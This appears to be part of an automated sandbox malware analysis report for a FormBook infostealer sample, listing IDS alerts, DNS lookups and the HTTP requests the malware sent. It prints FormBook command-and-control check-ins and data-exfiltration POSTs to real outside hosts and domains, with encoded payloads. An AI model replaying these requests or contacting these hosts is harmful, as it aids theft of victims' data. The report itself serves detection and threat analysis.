                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49743 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49823 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49823 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49747 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49917 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49917 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49970 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50006 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50006 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50036 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50044 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49865 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50061 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50060 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50040 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50060 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50062 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50068 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50068 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50056 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50066 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50064 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50064 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50065 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50067 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49901 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50063 -> 3.33.130.190:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.sidang.xyz
                Source: DNS query: www.hastanhizmetleri.xyz
                Source: DNS query: www.noudge.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.vaishnavi.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.gelida.xyz
                Source: DNS query: www.minimalbtc.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /cwaj/?Xxh=gDML3d2pDfBtJ2ap&_LJl=NmUfxQrz0WFQu6e1vB+SoVcrqvU6cnIrCagHYkSMqQArAACBkiI71BEuNA1edrIRm5QCdE2XawPBlU7vbp4PweTAT8mdIp68RMMynO1wCIcNWpVCCEAtjBA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.isoemarket.shopConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /6wi0/?_LJl=MUmOKOjVbEpAXFm5ojsL9MCXDP9ANRuc6TEVXWaXYAj73tUw1MgyAUdmulGWvnB4v8QQA07PGVxg24rIHlu1/xJx5dTIT8IpYtsk5wSD1aqos/TmJOCCeJ0=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /0j68/?Xxh=gDML3d2pDfBtJ2ap&_LJl=T5zk9dsLIunu/n4oUlTP4gZAP3+R2x3htRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/GNhVjyhXyM4NL1XTdd6dYFaSC5qk+IUWyyNFlngcmg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sidang.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /yw3f/?_LJl=EQSrhtPuDg3pW577166WlghPt5vxdDRHL6EaWebBO0TpTRxDo7/bTIB2xez8ddqkXF2LbmtEbkI7kZgVxT7fJzZJcMdh0GAOTlQVWNMsUxRrLieYgxhZ8N4=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hastanhizmetleri.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /n00b/?Xxh=gDML3d2pDfBtJ2ap&_LJl=iQ+QS1lo6uvIGGPPnanLgqLOpzj0MSJo2wOeU9EorhnMg6Dg3MakUEzOvHEw8ZD+mNMFq81MdilwNKpwrucL6Vt2oH5zaPln9XkZ0girAKVPZuHrKLR4370= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noudge.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /x35a/?_LJl=dWY7lI8HDhihY6JLbiucZJJQKNpznLVoIrDJkGpZj0gBIjegzPnOseQLWLFbNyUuWYMzRp0ci/LZueoJN+9YhClW67l+oM6F2/voW1mL842688cYRszVxsk=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.031235045.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /2p9f/?Xxh=gDML3d2pDfBtJ2ap&_LJl=kR4sXqxEqdCKxcd0uvMHrofbI2HL5Kt3h13R7fH3Y7T7Jml87ikCWT0lH6J8YdG1qFj+UvZ1zE/9YSWRQ7SaHH6DrYg9PJGFFvOYaHrPaLHfrFbZtFeZLTE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.fkrvhaupjtc.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /a255/?_LJl=71qW4Nx4dt5SfVYd8QHHJQDXud1LCbncD1lK2mKt9LCJZ4STjm65LcjSJQ2HTSiE+Z7WdPOkz4Dc0w/KNAm24ha5nae0dSQhsEEHHa5uibasovGJfCRdP1c=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vintageprod.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /lfjm/?Xxh=gDML3d2pDfBtJ2ap&_LJl=SYdBkJci5v39nf4QZCybwyWUgKKjg6ESvGXaIroc+h3NqMcJAPR48Il0IqREyzliai9XD9lgyxpgfQFl8d4whuH5wPCgGAw3FPtG4/TX/jHJqkuOwGey5Qs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vaishnavi.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /6m32/?_LJl=Va/we0xl003DQZZ5hAF+FceFrKluVme+bUy9vd5w4QTsm7kbnVGOKZ/fShoalOeRjCVBwCWzFLQL56uWIkSal+JXDav07SiGR8OPejcjaHIuPeZ4gX1wkdw=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.rbopisalive.cyouConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /o4w6/?_LJl=6lKfvrTTzjNBleesXlgVDxeyIVwfagVQ3seX6l6NteG/OnLU2Wkj2ZjnFUXwTNDzYGydJHdrz8GXGpxHCC5uJjTTCWCsRzSQoauigMKRyt96Bc+a1uKDTCk=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dualbitcoin.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /3xxf/?_LJl=nI71gAHwA2y1h+Hcmqsi9fVt7r47U8qUWZbbeDVE2zDMFU7E/I5Jnbhdlga2X4Rk93x69PX2UbpyE4MrGgdnarluiV+UTVJPy7Mb60xp/d/5aa/0q7/3Ews=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gelida.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /fhz4/?Xxh=gDML3d2pDfBtJ2ap&_LJl=y3wcV3BcSnsNbAsjCJpxQAmYegvJUPbqBMCwqxxOuE6l68kPpv6Jklxr3hJ8vTcwN6tD2iIaYUe19tgZRNYh7MR51dizai4/Q3yoeaZckVb96npVqAJAizw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.spacewalker.appConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /x1ok/?_LJl=59KYOEoUMDOvAyQxzYTgRKuVCDXA6kmZBotswWz2AJMcdqWyh/wiqqHIk/e5YCUGKcb3PS7ii7ge7s5ywJ4YDwvSVacKXJ832k4QCuc2X3Hjm8V1yeDqpLI=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /aimx/?_LJl=o7riQ79rwVwArQ5KlOVSty9ICz1QCTYnNKCrwKHViq0sTyAO0WThqGxq0+hT6gbNX7VYsYGamaiPTzh1Mo5mk6YUXNxkuftPs+bFWqicrE/EZYMMCkfU1V4=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.7gcapital.clubConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /t9cz/?_LJl=FkCKHETtaWCTj8DUTOS8ugzfwWtFiq+fJwPrhGD4NHB44S2i/ROBOfckrHQcQwaPZXVzuDEWosjqiur2WPMw4tj1AOUwwqx1aTVxxTJGW1I9zxBwrI+G2M0=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tkloqr.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficDNS traffic detected: DNS query: www.isoemarket.shop
                Source: global trafficDNS traffic detected: DNS query: www.vsilmhxj.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.sidang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.hastanhizmetleri.xyz
                Source: global trafficDNS traffic detected: DNS query: www.noudge.xyz
                Source: global trafficDNS traffic detected: DNS query: www.031235045.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fkrvhaupjtc.info
                Source: global trafficDNS traffic detected: DNS query: www.vintageprod.net
                Source: global trafficDNS traffic detected: DNS query: www.vaishnavi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.gelida.xyz
                Source: global trafficDNS traffic detected: DNS query: www.spacewalker.app
                Source: global trafficDNS traffic detected: DNS query: www.minimalbtc.xyz
                Source: global trafficDNS traffic detected: DNS query: www.7gcapital.club
                Source: global trafficDNS traffic detected: DNS query: www.tkloqr.info
                Source: unknownHTTP traffic detected: POST /6wi0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoOrigin: http://www.vsilmhxj.tokyoConnection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.vsilmhxj.tokyo/6wi0/User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25Data Raw: 5f 4c 4a 6c 3d 42 57 4f 75 4a 37 44 6b 55 57 46 43 57 30 76 2b 6a 51 63 50 6f 63 6a 78 49 75 34 62 41 43 47 30 72 51 51 6c 62 57 32 69 65 6a 50 77 37 4c 6f 43 33 37 6f 4c 44 30 70 6e 30 78 66 31 6a 6d 5a 6d 70 66 74 48 45 67 50 55 54 54 70 6a 32 4a 33 57 47 6c 79 31 76 6d 35 49 6e 64 50 53 55 35 55 41 56 4f 77 34 7a 57 54 30 34 38 75 51 6d 73 2f 6f 4f 5a 75 39 65 4e 4a 73 46 49 54 59 2f 63 41 35 48 77 43 67 36 39 7a 4e 73 57 58 76 6b 79 43 61 76 73 6d 45 67 4c 6b 47 46 77 64 74 76 74 79 38 77 63 39 4b 68 35 69 4a 43 71 64 2b 55 32 4c 64 47 35 70 70 79 77 6e 63 53 62 6c 74 76 4e 4a 6d 6d 67 3d 3d Data Ascii: 